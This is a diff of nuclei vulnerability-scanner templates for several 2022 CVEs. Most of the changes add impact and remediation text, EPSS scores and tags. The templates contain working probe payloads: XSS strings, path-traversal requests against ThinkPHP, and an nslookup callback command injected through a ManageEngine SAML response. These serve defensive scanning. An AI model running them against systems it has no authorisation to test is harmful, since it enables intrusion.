4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-46934.yaml b/nuclei-templates/CVE-2022/CVE-2022-46934.yaml index 6297e623fc..1cc5c60c65 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-46934.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-46934.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor. reference: - https://github.com/kekingcn/kkFileView/issues/411 - https://nvd.nist.gov/vuln/detail/CVE-2022-46934 @@ -14,29 +18,31 @@ info: cvss-score: 6.1 cve-id: CVE-2022-46934 cwe-id: CWE-79 - cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* - epss-score: 0.00085 + epss-score: 0.05604 + epss-percentile: 0.92519 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - verified: true - tags: xss,cve,cve2022,kkfileview + tags: cve,cve2022,xss,kkfileview,keking http: - method: GET path: - - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmNvb2tpZSk7Ly8=&urls" + - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls" matchers-condition: and matchers: - type: word words: - - "alert(document.cookie)" - - "document.getElementById" + - document.getElementById("http://");alert(document.domain);//").click(); + - viewer.min.css condition: and - type: status status: - 200 - -# Enhanced by md on 2023/04/13 +# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47002.yaml b/nuclei-templates/CVE-2022/CVE-2022-47002.yaml index fdc1c7408d..7e75887974 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47002.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47002.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the authentication bypass vulnerability in Masa CMS. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47002 cwe-id: CWE-863 - epss-score: 0.03698 - epss-percentile: 0.90756 + epss-score: 0.0395 + epss-percentile: 0.91808 cpe: cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: masacms product: masacms shodan-query: 'Generator: Masa CMS' - tags: cve,cve2022,auth-bypass,cms,masa + tags: cve,cve2022,auth-bypass,cms,masa,masacms http: - raw: @@ -74,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4a0a004730450220185e1dd863ff1a35f801012c1424bd6d6146286c33ca9a56aede709ec7e5a499022100e738cb43714b09f233773be9e83b5f152f96cee2b015de5213a857ca578ea480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47003.yaml b/nuclei-templates/CVE-2022/CVE-2022-47003.yaml index 3e945f5a90..0b3e0366f1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47003.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47003.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application. remediation: | Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability. reference: @@ -19,16 +21,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47003 cwe-id: CWE-863 - epss-score: 0.03016 - epss-percentile: 0.89866 + epss-score: 0.02341 + epss-percentile: 0.88676 cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: murasoftware product: mura_cms - shodan-query: 'Generator: Musa CMS' - tags: cve,cve2022,auth-bypass,cms,mura + shodan-query: 'Generator: Mura CMS' + tags: cve,cve2022,auth-bypass,cms,mura,murasoftware http: - raw: @@ -74,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4b0a00483046022100ef355cbfd34268757f09531c9b4788b834d6527f81af106393337503e4a4d84102210087d8dbf6f5a352cd7cd177e037d94f18990f1082b7daacebe779a1e72f4a6ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220440774df54f926d2f453b8d155ef6d625b0cf8b3bd6ae2c520e5bd1f2cd549d80220543f2ab0ffb604510676033c32003ea4f5ad46e6ea52fcd536b79e3eb9d5e4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47075.yaml b/nuclei-templates/CVE-2022/CVE-2022-47075.yaml index 0c49a5c68d..efd1c30340 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47075.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47075.yaml @@ -16,15 +16,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-47075 - epss-score: 0.00409 - epss-percentile: 0.70989 + epss-score: 0.00614 + epss-percentile: 0.76423 cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:* metadata: verified: true max-request: 1 vendor: smartofficepayroll product: smartoffice - tags: packetstorm,cve,cve2022,smart-office,info,exposure + tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll http: - method: GET @@ -38,4 +38,4 @@ http: - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and -# digest: 490a0046304402203e1843e1d611eb18b914bdfe592e4be4f50e3b4f2b3ee69b10222173bbc5d89c02206003f5bc64ec666cd68d917439ad327fb6829250256c6c6234f4885a4bbb8101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47615.yaml b/nuclei-templates/CVE-2022/CVE-2022-47615.yaml index bcf92d2bcb..79ca1ad0db 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47615.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47615.yaml @@ -6,19 +6,22 @@ info: severity: critical description: | Local File Inclusion vulnerability in LearnPress – WordPress LMS Plugin <= 4.1.7.3.2 versions. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, remote code execution, or information disclosure. remediation: | Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability. reference: - https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2022-47615 - https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve + - https://github.com/RandomRobbieBF/CVE-2022-47615 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47615 cwe-id: CWE-434 - epss-score: 0.00729 - epss-percentile: 0.78576 + epss-score: 0.01111 + epss-percentile: 0.84217 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: product: learnpress framework: wordpress publicwww-query: "/wp-content/plugins/learnpress" - tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi + tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress http: - raw: @@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a212abcd18616e4d0b02618ef2d905b4f6b3ddfd7f4c3b65de72b5ae6833dec302210088aa9556cd5ca1cbd0706c4e2b09fa655f473b217ca4dc1ee974f505518ecaad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47945.yaml b/nuclei-templates/CVE-2022/CVE-2022-47945.yaml index 1c551d9087..57cb7e14bf 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47945.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47945.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. + remediation: | + Apply the latest security patches and updates provided by the Thinkphp framework. reference: - https://tttang.com/archive/1865/ - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 @@ -15,19 +19,27 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47945 + cwe-id: CWE-22 + epss-score: 0.03747 + epss-percentile: 0.90906 + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: - fofa-query: header="think_lang" + verified: true + max-request: 2 + vendor: thinkphp + product: thinkphp shodan-query: title:"Thinkphp" - verified: "true" + fofa-query: header="think_lang" tags: cve,cve2022,thinkphp,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/?lang=../../thinkphp/base" - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -40,5 +52,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2023/01/15 +# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47966.yaml b/nuclei-templates/CVE-2022/CVE-2022-47966.yaml index ad4d5b7d34..d94cd6858d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47966.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47966.yaml @@ -6,25 +6,35 @@ info: severity: critical description: | Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html - https://nvd.nist.gov/vuln/detail/CVE-2022-47966 + - http://packetstormsecurity.com/files/170882/Zoho-ManageEngine-ServiceDesk-Plus-14003-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47966 + epss-score: 0.97422 + epss-percentile: 0.9993 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_access_manager_plus shodan-query: title:"ManageEngine" - verified: "true" - tags: cve,cve2022,rce,zoho,manageengine,oast,kev - + tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp variables: cmd: 'nslookup {{interactsh-url}}' - SAMLResponse: ' a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== ' + SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== -requests: +http: - raw: - | POST /SamlResponseServlet HTTP/2 @@ -48,3 +58,4 @@ requests: - type: status status: - 500 +# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-47986.yaml b/nuclei-templates/CVE-2022/CVE-2022-47986.yaml index a75c3b60a2..0128412d08 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-47986.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-47986.yaml @@ -1,25 +1,37 @@ id: CVE-2022-47986 info: - name: Pre-Auth RCE in Aspera Faspex + name: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution author: coldfish severity: critical description: | - IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. + IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. reference: - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/ - https://www.ibm.com/support/pages/node/6952319 - remediation: This vulnerability can be remediated by either upgrading to Faspex 4.4.2 Patch Level 2 or Faspex 5.x which does not contain this vulnerability. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 + - http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-47986 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47986 + cwe-id: CWE-502 + epss-score: 0.9223 + epss-percentile: 0.98769 + cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: ibm + product: aspera_faspex shodan-query: html:"Aspera Faspex" - tags: cve,cve2022,ibm,aspera,faspex + tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm -requests: +http: - raw: - | POST /aspera/faspex/package_relay/relay_package HTTP/1.1 @@ -31,15 +43,16 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' - - type: word part: header words: - "text/html" + - type: regex + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + - type: status status: - 500 +# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48012.yaml b/nuclei-templates/CVE-2022/CVE-2022-48012.yaml index 2e62912c98..3ddb48c252 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48012.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48012.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48012 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29441 + epss-score: 0.00112 + epss-percentile: 0.43742 cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +54,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 490a004630440220535d58625037496b4ccb2b12d7e617d35ad0a1d5018b5b75566a18ebfcb23b170220053e49612cb0174001bfa5c9706f7b33f286177e468ab8e9e239cdeaa2c8eedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48165.yaml b/nuclei-templates/CVE-2022/CVE-2022-48165.yaml index 7665b234e6..7684a3ebc6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48165.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48165.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations. + impact: | + The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: @@ -19,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-48165 cwe-id: CWE-284 - epss-score: 0.02709 - epss-percentile: 0.89383 + epss-score: 0.04111 + epss-percentile: 0.9131 cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: wavlink product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 - tags: cve,cve2022,wavlink,router,exposure + tags: cve2022,cve,wavlink,router,exposure http: - method: GET @@ -57,4 +59,4 @@ http: - type: regex regex: - 'Password=([^\s]+)' -# digest: 490a00463044022046e96cd32160d980ace726b82e83ecfbde1a11a5ae0b59434ee334430ec154c60220283e5c5a7f97616c9b25a70acdcd0d9794e75cba4b2cba113ff6b862a30ecf40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-48197.yaml b/nuclei-templates/CVE-2022/CVE-2022-48197.yaml index 759177c67e..bf7df1101d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-48197.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-48197.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 - epss-score: 0.00139 - epss-percentile: 0.49291 + epss-score: 0.0012 + epss-percentile: 0.45243 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,20 +27,23 @@ info: vendor: yui_project product: yui shodan-query: html:"bower_components/yui2/" - tags: packetstorm,yui2,cve,cve2022,xss,yahoo,treeview + tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project http: - method: GET path: - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}{{paths}}" + payloads: + paths: + - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true @@ -61,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8e6bc7263fafdf6faa7d0972fa731f63137f6de42a429a124f23bd09da540e0022100b56ccb22cb37558b3a43c7761357663920118050439e6e7d24874ec1d001d64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200aa8dc45df93b31a509392bc137d444a730cbc113463d4d68a4cfb6d1e29e7b902202a7bcbef9175bddea3bf0e2803fecb56207e4961e90ae4011704631f27b92908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4897.yaml b/nuclei-templates/CVE-2022/CVE-2022-4897.yaml index 43d78b7f9d..15c127aa44 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4897.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4897.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 8.8.3. reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f @@ -16,7 +18,7 @@ info: cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65503 + epss-percentile: 0.65597 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: ithemes product: backupbuddy framework: wordpress - tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated + tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(body_2, "onload=alert(document.domain)")' - 'contains(body_2, "BackupBudddy iFrame")' condition: and -# digest: 490a00463044022068ea89cefce681b40542a73a2df15ae352a45453df7ddb6e01d0cc00e396fd4802206d80e3c01d45c5b7ab73b5a0216b93cbf7f30b45ec940ff14cbef393de8a2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0140.yaml b/nuclei-templates/CVE-2022/cve-2022-0140.yaml new file mode 100644 index 0000000000..5c5b1d5e09 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0140.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-0140 + +info: + name: WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting + author: random-robbie + severity: medium + description: | + WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336 + - https://www.fortiguard.com/zeroday/FG-VD-21-082 + - 